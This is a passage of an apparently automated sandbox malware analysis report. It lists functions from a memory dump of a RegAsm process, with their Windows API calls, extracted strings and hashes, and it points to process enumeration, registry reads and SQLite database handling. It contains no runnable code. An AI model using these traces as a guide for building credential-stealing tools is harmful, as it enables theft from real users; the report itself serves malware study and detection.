                                                                        • wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                        • wcslen.MSVCRT ref: 0040D1D3
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                        • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                        • memcpy.MSVCRT ref: 0040D24C
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                        • String ID: strings
                                                                        • API String ID: 3166385802-3030018805
                                                                        • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                        • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                        Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040D8BD
                                                                        • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                        • memset.MSVCRT ref: 0040D906
                                                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                        • _wcsicmp.MSVCRT ref: 0040D92F
                                                                          • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                          • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                        • String ID: sysdatetimepick32
                                                                        • API String ID: 1028950076-4169760276
                                                                        • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                        • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                        • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                        • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                        Function 004044A4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Library$FreeLoadMessage
                                                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                        • API String ID: 3897320386-317687271
                                                                        • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                        • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                        • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                        • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                        Function 004138C1 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                        • API String ID: 4271163124-70141382
                                                                        • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                        • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                        • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                                        • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                        Function 0041383D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                        • API String ID: 4139908857-3953557276
                                                                        • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                        • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                        • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                        • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                        Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID: -journal$-wal
                                                                        • API String ID: 438689982-2894717839
                                                                        • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                        • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                        • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                        • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                        Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                        • String ID:
                                                                        • API String ID: 4218492932-0
                                                                        • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                        • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                        • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                        • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                        Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                          • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                          • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                        • memcpy.MSVCRT ref: 0044A8BF
                                                                        • memcpy.MSVCRT ref: 0044A90C
                                                                        • memcpy.MSVCRT ref: 0044A988
                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                          • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                        • memcpy.MSVCRT ref: 0044A9D8
                                                                        • memcpy.MSVCRT ref: 0044AA19
                                                                        • memcpy.MSVCRT ref: 0044AA4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memset
                                                                        • String ID: gj
                                                                        • API String ID: 438689982-4203073231
                                                                        • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                        • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                        • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                        • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                        Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                        • String ID: 0$6
                                                                        • API String ID: 2029023288-3849865405
                                                                        • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                        • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                        • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                        • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                        Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                        • memset.MSVCRT ref: 00405455
                                                                        • memset.MSVCRT ref: 0040546C
                                                                        • memset.MSVCRT ref: 00405483
                                                                        • memcpy.MSVCRT ref: 00405498
                                                                        • memcpy.MSVCRT ref: 004054AD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$memcpy$ErrorLast
                                                                        • String ID: 6$\
                                                                        • API String ID: 404372293-1284684873
                                                                        • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                        • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                        • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                        • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                        Function 0041851E Relevance: 10.6, APIs: 7, Instructions: 67sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                        • GetLastError.KERNEL32 ref: 0041855C
                                                                        • Sleep.KERNEL32(00000064), ref: 00418571
                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                        • GetLastError.KERNEL32 ref: 0041858E
                                                                        • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesErrorFileLastSleep$??3@
                                                                        • String ID:
                                                                        • API String ID: 1040972850-0
                                                                        • Opcode ID: 50043058a1b5c1adbd70e35514f2ed55e6e14a886e8aa5764a6ab2805656462d
                                                                        • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                        • Opcode Fuzzy Hash: 50043058a1b5c1adbd70e35514f2ed55e6e14a886e8aa5764a6ab2805656462d
                                                                        • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                        Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                        • wcscpy.MSVCRT ref: 0040A0D9
                                                                        • wcscat.MSVCRT ref: 0040A0E6
                                                                        • wcscat.MSVCRT ref: 0040A0F5
                                                                        • wcscpy.MSVCRT ref: 0040A107
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                        • String ID:
                                                                        • API String ID: 1331804452-0
                                                                        • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                        • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                        Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                        • <%s>, xrefs: 004100A6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf
                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                        • API String ID: 3473751417-2880344631
                                                                        • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                        • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                        Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscat$_snwprintfmemset
                                                                        • String ID: %2.2X
                                                                        • API String ID: 2521778956-791839006
                                                                        • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                        • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                        Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _snwprintfwcscpy
                                                                        • String ID: dialog_%d$general$menu_%d$strings
                                                                        • API String ID: 999028693-502967061
                                                                        • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                        • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                        • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                        • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                        Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                          • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                          • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                          • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                                        • memset.MSVCRT ref: 0040C439
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                        • _wcsupr.MSVCRT ref: 0040C481
                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                          • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                        • memset.MSVCRT ref: 0040C4D0
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                        • String ID:
                                                                        • API String ID: 1973883786-0
                                                                        • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                        • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                        • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                        • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                        Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004116FF
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                          • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                        • API String ID: 2618321458-3614832568
                                                                        • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                        • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                        • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                        • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                        Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004185FC
                                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@AttributesFilememset
                                                                        • String ID:
                                                                        • API String ID: 776155459-0
                                                                        • Opcode ID: ef83091bc29200ae48f83625ef90a1b8166089f0f49cdf46917f98b7e2a69a6f
                                                                        • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                        • Opcode Fuzzy Hash: ef83091bc29200ae48f83625ef90a1b8166089f0f49cdf46917f98b7e2a69a6f
                                                                        • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                        Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                        • malloc.MSVCRT ref: 00417524
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                        • String ID:
                                                                        • API String ID: 2308052813-0
                                                                        • Opcode ID: cfc41928342c7d38ba537b091ccfa7db5b1ec00e42cfc0566f3bf65c10721e95
                                                                        • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                        • Opcode Fuzzy Hash: cfc41928342c7d38ba537b091ccfa7db5b1ec00e42cfc0566f3bf65c10721e95
                                                                        • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                        Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                        • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PathTemp$??3@
                                                                        • String ID: %s\etilqs_$etilqs_
                                                                        • API String ID: 1589464350-1420421710
                                                                        • Opcode ID: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                        • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                        • Opcode Fuzzy Hash: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                        • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                        Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
